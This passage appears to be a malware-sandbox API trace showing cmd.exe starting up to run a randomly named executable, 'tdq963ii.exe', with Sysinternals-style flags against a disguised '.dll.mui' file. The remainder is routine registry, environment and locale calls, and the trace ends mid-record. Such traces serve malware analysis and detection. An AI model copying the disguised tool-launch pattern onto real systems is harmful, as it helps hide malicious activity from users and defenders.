monitor_reason = "child_process" parent_id = "210" os_parent_pid = "0xab8" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"jnwmon.dll.mui\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 857 os_tid = 0xac4 [0234.341] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef8e4 | out: lpSystemTimeAsFileTime=0x1ef8e4*(dwLowDateTime=0x42905780, dwHighDateTime=0x1d68287)) [0234.341] GetCurrentProcessId () returned 0xaf0 [0234.342] GetCurrentThreadId () returned 0xac4 [0234.342] GetTickCount () returned 0x1165e08 [0234.342] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef8dc | out: lpPerformanceCount=0x1ef8dc*=35468075111) returned 1 [0234.345] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0234.345] __set_app_type (_Type=0x1) [0234.345] __p__fmode () returned 0x770331f4 [0234.345] __p__commode () returned 0x770331fc [0234.345] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0234.345] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0234.345] GetCurrentThreadId () returned 0xac4 [0234.345] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xac4) returned 0x60 [0234.346] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0234.346] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0234.346] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.346] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.346] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef874 | out: phkResult=0x1ef874*=0x0) returned 0x2 [0234.346] VirtualQuery (in: lpAddress=0x1ef8ab, lpBuffer=0x1ef844, dwLength=0x1c | out: lpBuffer=0x1ef844*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.347] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1ef844, dwLength=0x1c | out: lpBuffer=0x1ef844*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.347] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1ef844, dwLength=0x1c | out: lpBuffer=0x1ef844*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.347] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1ef844, dwLength=0x1c | out: lpBuffer=0x1ef844*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.347] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1ef844, dwLength=0x1c | out: lpBuffer=0x1ef844*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.347] GetConsoleOutputCP () returned 0x1b5 [0234.347] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0234.347] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0234.347] _get_osfhandle (_FileHandle=1) returned 0x80 [0234.347] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0234.347] _get_osfhandle (_FileHandle=1) returned 0x80 [0234.348] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0234.348] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.348] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0234.348] GetEnvironmentStringsW () returned 0x5421e0* [0234.348] GetProcessHeap () returned 0x530000 [0234.348] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb84) returned 0x542d70 [0234.349] FreeEnvironmentStringsW (penv=0x5421e0) returned 1 [0234.349] GetProcessHeap () returned 0x530000 [0234.349] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4) returned 0x542060 [0234.349] GetEnvironmentStringsW () returned 0x5421e0* [0234.349] GetProcessHeap () returned 0x530000 [0234.349] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb84) returned 0x543900 [0234.349] FreeEnvironmentStringsW (penv=0x5421e0) returned 1 [0234.349] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee7e4 | out: phkResult=0x1ee7e4*=0x68) returned 0x0 [0234.350] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x0, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0234.350] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x1, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0234.350] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x1, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0234.350] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x0, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0234.350] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x40, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0234.350] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x40, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0234.350] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x40, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0234.350] RegCloseKey (hKey=0x68) returned 0x0 [0234.350] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee7e4 | out: phkResult=0x1ee7e4*=0x68) returned 0x0 [0234.350] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x40, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0234.351] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x1, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0234.351] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x1, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0234.351] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x0, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0234.351] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x9, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0234.351] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x9, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0234.351] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x9, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0234.351] RegCloseKey (hKey=0x68) returned 0x0 [0234.351] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e302 [0234.351] srand (_Seed=0x5f51e302) [0234.351] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"jnwmon.dll.mui\" -nobanner" [0234.351] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"jnwmon.dll.mui\" -nobanner" [0234.352] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0234.353] GetProcessHeap () returned 0x530000 [0234.353] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x210) returned 0x544490 [0234.353] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x544498, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0234.353] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.353] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.353] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0234.353] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.353] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.353] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.353] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.353] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.353] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.353] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.354] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.354] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.354] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.354] GetProcessHeap () returned 0x530000 [0234.354] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x54) returned 0x5446a8 [0234.354] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef5b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0234.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef5b0, lpFilePart=0x1ef5ac | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1ef5ac*="Desktop") returned 0x25 [0234.354] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0234.354] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef32c | out: lpFindFileData=0x1ef32c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x542070 [0234.354] FindClose (in: hFindFile=0x542070 | out: hFindFile=0x542070) returned 1 [0234.354] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1ef32c | out: lpFindFileData=0x1ef32c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x542070 [0234.355] FindClose (in: hFindFile=0x542070 | out: hFindFile=0x542070) returned 1 [0234.355] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0234.355] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1ef32c | out: lpFindFileData=0x1ef32c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x542070 [0234.355] FindClose (in: hFindFile=0x542070 | out: hFindFile=0x542070) returned 1 [0234.355] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0234.355] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0234.355] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0234.355] GetProcessHeap () returned 0x530000 [0234.355] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x542d70 | out: hHeap=0x530000) returned 1 [0234.355] GetEnvironmentStringsW () returned 0x5421e0* [0234.355] GetProcessHeap () returned 0x530000 [0234.355] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb84) returned 0x542d70 [0234.356] FreeEnvironmentStringsW (penv=0x5421e0) returned 1 [0234.356] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0234.356] GetProcessHeap () returned 0x530000 [0234.356] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5446a8 | out: hHeap=0x530000) returned 1 [0234.356] GetProcessHeap () returned 0x530000 [0234.356] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x400e) returned 0x544f08 [0234.356] GetProcessHeap () returned 0x530000 [0234.356] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x74) returned 0x548f38 [0234.357] GetProcessHeap () returned 0x530000 [0234.357] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544f08 | out: hHeap=0x530000) returned 1 [0234.357] GetConsoleOutputCP () returned 0x1b5 [0234.357] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0234.357] GetUserDefaultLCID () returned 0x409 [0234.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0234.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef6f0, cchData=128 | out: lpLCData="0") returned 2 [0234.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef6f0, cchData=128 | out: lpLCData="0") returned 2 [0234.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef6f0, cchData=128 | out: lpLCData="1") returned 2 [0234.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0234.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.359] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0234.359] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0234.359] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.360] GetProcessHeap () returned 0x530000 [0234.360] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x20c) returned 0x5421e0 [0234.360] GetConsoleTitleW (in: lpConsoleTitle=0x5421e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.361] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0234.361] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0234.361] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0234.361] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0234.362] GetProcessHeap () returned 0x530000 [0234.362] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x400a) returned 0x544f08 [0234.362] GetProcessHeap () returned 0x530000 [0234.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544f08 | out: hHeap=0x530000) returned 1 [0234.364] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0234.364] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0234.364] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0234.364] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0234.364] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0234.364] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0234.364] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0234.364] GetProcessHeap () returned 0x530000 [0234.364] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x58) returned 0x5446a8 [0234.364] GetProcessHeap () returned 0x530000 [0234.364] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x22) returned 0x5423f8 [0234.365] GetProcessHeap () returned 0x530000 [0234.365] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x58) returned 0x542428 [0234.367] GetConsoleTitleW (in: lpConsoleTitle=0x1ef3e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.368] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0234.368] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0234.369] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0234.370] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0234.371] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0234.371] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0234.371] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0234.371] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 